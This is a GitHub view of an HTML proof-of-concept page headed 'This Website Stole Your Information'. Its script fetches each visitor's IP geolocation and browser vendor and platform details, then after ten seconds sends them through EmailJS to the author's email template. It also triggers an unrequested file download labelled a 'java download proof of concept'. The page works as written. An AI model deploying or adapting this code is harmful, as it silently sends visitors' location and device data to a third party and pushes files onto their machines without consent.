-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtest.html
More file actions
43 lines (40 loc) · 1.25 KB
/
test.html
File metadata and controls
43 lines (40 loc) · 1.25 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript" src="https://cdn.emailjs.com/sdk/2.3.2/email.min.js"></script>
<script type="text/javascript">
(function(){
emailjs.init("user_hMTs9wOeOef6Ag1fLEhBI");
})();
</script>
</head>
<body>
<h1>This Website Stole Your Information</h1>
<p>It utilizes javascript libraries and api's to passivly steal information from you. If you want to peek under the hood inspect element.</p>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
<script src="platform.js"></script>
<script src="download.js"></script>
<script>
var datari = "null";
jQuery.getJSON('https://json.geoiplookup.io/api?callback=?', function(data) {
datari = JSON.stringify(data, null, 2);
console.log(datari)
});
setTimeout(function () {
var nav = window.navigator.vendor;
console.log(nav);
var service_id = 'gmail';
var template_id = 'template_HMN2X4qP';
var template_params = {
to_name: 'John',
from_name: 'john@doe.com',
message_html: datari,
vendor: window.navigator.vendor,
producti: platform
};
emailjs.send(service_id,template_id,template_params);
}, 10000);
download("Screen Shot 2019-04-29 at 1.37.01 PM.png", "java download proof of concept");
</script>
</body>
</html>